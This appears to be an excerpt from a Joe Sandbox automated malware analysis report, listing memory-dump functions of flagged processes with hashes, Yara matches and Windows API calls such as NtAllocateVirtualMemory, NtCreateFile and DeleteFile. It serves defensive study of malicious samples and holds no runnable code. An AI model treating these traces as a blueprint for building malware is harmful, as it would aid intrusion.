                                                                                  • Opcode ID: db87521331f17f9da3a909a6d235482b4134c0113c60fafdf354c847a132f476
                                                                                  • Instruction ID: ed4fdd14d1268c22ba484a8e114e990e9d58935c359b4269845c257bd26ea8c7
                                                                                  • Opcode Fuzzy Hash: db87521331f17f9da3a909a6d235482b4134c0113c60fafdf354c847a132f476
                                                                                  • Instruction Fuzzy Hash: 30613FB2900304AFDB25DBA4CC84FEFB7FDAB88714F104559E61AA7240E775AB45CB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $i$l$o$u
                                                                                  • API String ID: 0-2051669658
                                                                                  • Opcode ID: f20e4d6824bdf9b661ae3668a5a38a0b3c596d33dd4645c3c629ee493e264c21
                                                                                  • Instruction ID: 4541f1dcd957edec48cd95f062d34515b5bfb184d0d2b0bb8152cfb847adb9f2
                                                                                  • Opcode Fuzzy Hash: f20e4d6824bdf9b661ae3668a5a38a0b3c596d33dd4645c3c629ee493e264c21
                                                                                  • Instruction Fuzzy Hash: 0D411DB1900308AFDB64DFA4CC84FEFBBFDAB48704F104559E619A7240D771AA45CB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$0$6$I$P
                                                                                  • API String ID: 0-1705191920
                                                                                  • Opcode ID: 6cd82b9dcd8db3bc8646130042d3e90716340b5b85d00330fa7dcf82057e2479
                                                                                  • Instruction ID: a19802fdc83cd9cdaca5b8f960d3d1cf8e502240de48c2832d9a9773adeaf64a
                                                                                  • Opcode Fuzzy Hash: 6cd82b9dcd8db3bc8646130042d3e90716340b5b85d00330fa7dcf82057e2479
                                                                                  • Instruction Fuzzy Hash: D4215EB1A14209BBEF11DFA4CC45BEF77B9EF05304F004189EA08A7241E776AA048BE5

                                                                                  Execution Graph

                                                                                  Execution Coverage: 2.5%
                                                                                  Dynamic/Decrypted Code Coverage: 4.1%
                                                                                  Signature Coverage: 2.2%
                                                                                  Total number of Nodes: 461
                                                                                  Total number of Limit Nodes: 76

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d$&B$)$*#$1$:$:}$OV$Q$U$]$_$_-$_<$b*$e$i3$i:$v2
                                                                                  • API String ID: 0-3217503214
                                                                                  • Opcode ID: c49d169a659368fe71844be9ac865211b6baaaa35d2d0f69a42ed5262277164d
                                                                                  • Instruction ID: f65e272f77f579c5f4c891f5207e1bc6f271ae4ff2774d6f616308607a1a0558
                                                                                  • Opcode Fuzzy Hash: c49d169a659368fe71844be9ac865211b6baaaa35d2d0f69a42ed5262277164d
                                                                                  • Instruction Fuzzy Hash: 6632BFB4D05229CBEB68CF44C898BEDBBB1BF45308F6481D9D0096B281D7B95AC9CF45
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 001BCD34
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 001BCD6F
                                                                                  • FindClose.KERNELBASE(?), ref: 001BCD7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                                  • Instruction ID: 3965b152b6b6f4bd098f2dcdc5497d513f2b1ec60072aef3aaa23914c672f6c4
                                                                                  • Opcode Fuzzy Hash: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                                  • Instruction Fuzzy Hash: AA317075A003487BDB20DFA4CC86FEF77BCAF55744F104159F909A6191DB70AA848BE0
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?,?,?), ref: 001C9908
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                                  • Instruction ID: 45a45d39075e7b72db331adb086c1a7d408cb12497a67af5a0e26cabe01dcf19
                                                                                  • Opcode Fuzzy Hash: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                                  • Instruction Fuzzy Hash: 5E31C2B5A01248AFDB54DF98D881EEFBBB9AF9C704F108109F908A7244D770A951CBA5
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?), ref: 001C9A53
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                                  • Instruction ID: 38ff4de9eaf9300fbe56393c9733bb945d1ed4a52f29db2421c14b3af6c685c3
                                                                                  • Opcode Fuzzy Hash: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                                  • Instruction Fuzzy Hash: D231E5B5A00248AFDB14DF98C881EEFB7B9EF98714F108209FD18A7245D770A951CBA1
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(001B240E,?,59BA9130,00000000,00000004,00003000,?,?,?,?,?,001C860F,001B240E,?,?,001CBAEE), ref: 001C9D12
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                                  • Instruction ID: 2d4579824c83cb336602c357caddb05ab0483e9d3e5a702d658e7c6d6c4c2820
                                                                                  • Opcode Fuzzy Hash: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                                  • Instruction Fuzzy Hash: 8D2117B5A00249ABDB10DF98CC81FAFBBB9EF98704F108109FD08A7245D774A951CBA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                                  • Instruction ID: ca74c155cf6aeffdce5543f51c8007222cef3021a138efc3c9ccb4e08a1ff8cd
                                                                                  • Opcode Fuzzy Hash: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                                  • Instruction Fuzzy Hash: 4E119E315006497BD720EB98CC42FEFB7ACDFA5704F004109FA08A7281EB70A9458BA1
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001C9B34
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction ID: 0e4bd4dc5b155b1884238d690c960a2b08d85a1144aabb3a8e55004250830bfb
                                                                                  • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction Fuzzy Hash: BCE08C3A2012087BD620FA69CC41FDBBBACDFC6B54F404419FA18A7242C7B0B9418BF5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: adb1702affeaa1a9a5a15cf7a5a16e40656c0c7948d049d358a68e3d01145253
                                                                                  • Instruction ID: c3f3bdaf17606c6081c48b9d7dd6d6e5db2fb147bd86394e27d7b5e05f432d7c
                                                                                  • Opcode Fuzzy Hash: adb1702affeaa1a9a5a15cf7a5a16e40656c0c7948d049d358a68e3d01145253
                                                                                  • Instruction Fuzzy Hash: 85900275601510526144715C490540670059BE1315395E215A0555560C8A18D9559269
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0798c82cd060883fa6e3c1794396b1ded6a1100f8a37db8e6ed2a319e48ddae1
                                                                                  • Instruction ID: 17bc6605b12b49285838e6e7023f8a066b3db525facf6525ad75d312530e1ed9
                                                                                  • Opcode Fuzzy Hash: 0798c82cd060883fa6e3c1794396b1ded6a1100f8a37db8e6ed2a319e48ddae1
                                                                                  • Instruction Fuzzy Hash: E890023560581022B144715C498554650059BE0315B55E111E0425554C8E14DA565361
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: eaa06cf57971519ec9bfa94c18b3d2048350bca9ca0c65160ab941230da3e341
                                                                                  • Instruction ID: af7080bd969171f54b3ad6902952dc3b28ca5cb105c7f70883267cba0152a32d
                                                                                  • Opcode Fuzzy Hash: eaa06cf57971519ec9bfa94c18b3d2048350bca9ca0c65160ab941230da3e341
                                                                                  • Instruction Fuzzy Hash: 0590023520149812F114715C850574A10058BD0315F59E511A4425658D8A95D9917121
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: dd031dba7c61e8d54fb6ef8b79194f36bf994da989f1bc38d688356ecf00bc58
                                                                                  • Instruction ID: 5db4fabfa0d1a115e6c2c16f364c52bafedfb836b3f9fbf532446cc1f9fd3e18
                                                                                  • Opcode Fuzzy Hash: dd031dba7c61e8d54fb6ef8b79194f36bf994da989f1bc38d688356ecf00bc58
                                                                                  • Instruction Fuzzy Hash: E190023520141852F104715C4505B4610058BE0315F55E116A0125654D8A15D9517521
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9b463eaeb6a8c51dfc5b08e459347fe453b765891ac205c8e1a7ae353e0507c0
                                                                                  • Instruction ID: fff2c346373b659125d840d2437108f6fe8886109c97c4ba5b122a680afebdf7
                                                                                  • Opcode Fuzzy Hash: 9b463eaeb6a8c51dfc5b08e459347fe453b765891ac205c8e1a7ae353e0507c0
                                                                                  • Instruction Fuzzy Hash: 7890023520141412F104759C550964610058BE0315F55F111A5025555ECA65D9916131
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 24121601d5d59a69cc402729d44e8c807d505ae19927a72f7b6b616ec7fc20b4
                                                                                  • Instruction ID: 6fe4496c939a0d98847fbd4d567be9f98dff863861db4d3c5a969be72ade7fdd
                                                                                  • Opcode Fuzzy Hash: 24121601d5d59a69cc402729d44e8c807d505ae19927a72f7b6b616ec7fc20b4
                                                                                  • Instruction Fuzzy Hash: C790043530141013F144715C551D7075005DFF1315F55F111F0415554CDD15DD575333
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e004d00f971409208b656e69aeff578dc398930e66f4a4a48103c944248ff73b
                                                                                  • Instruction ID: 8d1124f4f3bad428160214899a1ca3e0164d45fe579f435ddc161b0b6e8965af
                                                                                  • Opcode Fuzzy Hash: e004d00f971409208b656e69aeff578dc398930e66f4a4a48103c944248ff73b
                                                                                  • Instruction Fuzzy Hash: 5190023D21341012F184715C550960A10058BD1216F95F515A0016558CCD15D9695321
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 1f1d593375db5f01328b09f9659006aaba61ae4b132d7efd788cd27521deecec
                                                                                  • Instruction ID: 723ce51080cea236da32d606052dd511914ae04fcad3d62f995ca278f1898788
                                                                                  • Opcode Fuzzy Hash: 1f1d593375db5f01328b09f9659006aaba61ae4b132d7efd788cd27521deecec
                                                                                  • Instruction Fuzzy Hash: BB90023520141423F115715C460570710098BD0255F95E512A0425558D9A56DA52A121
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 409b190d8559c6d98045da7d7025f0e2bae3442c9f2a3a6da7093d23955e3982
                                                                                  • Instruction ID: 72650922e3d73923a74340875f0747af714d23f8d7d0d1065d4002a229bcb2e8
                                                                                  • Opcode Fuzzy Hash: 409b190d8559c6d98045da7d7025f0e2bae3442c9f2a3a6da7093d23955e3982
                                                                                  • Instruction Fuzzy Hash: 2B900235242451627549B15C450550750069BE0255795E112A1415950C8926E956D621
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e2ebe01dae0ccb5de7eabf72f515c1792d76f6c47adf2df57de8fd10388981f3
                                                                                  • Instruction ID: 8516281a541c1cd706c27f270e77fcc1acfd520a71e5e54a23471414f6fbf96b
                                                                                  • Opcode Fuzzy Hash: e2ebe01dae0ccb5de7eabf72f515c1792d76f6c47adf2df57de8fd10388981f3
                                                                                  • Instruction Fuzzy Hash: 8390023560141512F105715C4505616100A8BD0255F95E122A1025555ECE25DA92A131
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9cd4a68f9b4af2f6d797b582bf3d1523a327cb34bee751153d8e3feb6c862fc4
                                                                                  • Instruction ID: 15798f5d5a316df32fc65ea0d3f5c5929d0214626fd65c56972ba590e349ed9e
                                                                                  • Opcode Fuzzy Hash: 9cd4a68f9b4af2f6d797b582bf3d1523a327cb34bee751153d8e3feb6c862fc4
                                                                                  • Instruction Fuzzy Hash: B690027520181413F144755C490560710058BD0316F55E111A2065555E8E29DD516135
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: c7cbfe7f755e7dd6e056389d3ef9bdc366999ca1c92ee26d33913c152c9e6660
                                                                                  • Instruction ID: e0cef66b266c0823a229fc92affe9f4d9cb60959063ea3a47e95f7b81ad0dd58
                                                                                  • Opcode Fuzzy Hash: c7cbfe7f755e7dd6e056389d3ef9bdc366999ca1c92ee26d33913c152c9e6660
                                                                                  • Instruction Fuzzy Hash: 4B90027534141452F104715C4515B061005CBE1315F55E115E1065554D8A19DD526126
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 01c0371f2cc996588bdc419510a6ea1c1a601f2959d3825b9bae23898b86e79c
                                                                                  • Instruction ID: 0616f1a5e8e1562d1c0d8ce01e813b2d3189fb2b73fd1049a1c3c0068db3fdb7
                                                                                  • Opcode Fuzzy Hash: 01c0371f2cc996588bdc419510a6ea1c1a601f2959d3825b9bae23898b86e79c
                                                                                  • Instruction Fuzzy Hash: 41900235601410526144716C89459065005AFE1225755E221A0999550D8959D9655665
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: ef59f1c3432b27c5533924291c4e970d7e0a50e19429644b14a5f2e26c2730c5
                                                                                  • Instruction ID: bce69ee455cc670d2ad90ed4154bf35ce3249f6b039b5c3654a855090a34ac7a
                                                                                  • Opcode Fuzzy Hash: ef59f1c3432b27c5533924291c4e970d7e0a50e19429644b14a5f2e26c2730c5
                                                                                  • Instruction Fuzzy Hash: 16900235211C1052F204756C4D15B0710058BD0317F55E215A0155554CCD15D9615521
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f60f71c4744f3f86c596ad720e47b8c01d334979fa71cc1a7be0205580666e2c
                                                                                  • Instruction ID: b599d2e0f636e59036fec230c46b5556b57fa73cab7ccc57e99f48a16446c44e
                                                                                  • Opcode Fuzzy Hash: f60f71c4744f3f86c596ad720e47b8c01d334979fa71cc1a7be0205580666e2c
                                                                                  • Instruction Fuzzy Hash: C2900239221410122149B55C070550B14459BD6365395E115F1417590CCA21D9655321
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 263984f3dee8247f1c3ce17848bbdc4257d1be5fa19fa31956d7c50a6c552719
                                                                                  • Instruction ID: 978aba51d6392f4d25da52a471fce2a71cafcb7235416ecaa2a8a567986dfd74
                                                                                  • Opcode Fuzzy Hash: 263984f3dee8247f1c3ce17848bbdc4257d1be5fa19fa31956d7c50a6c552719
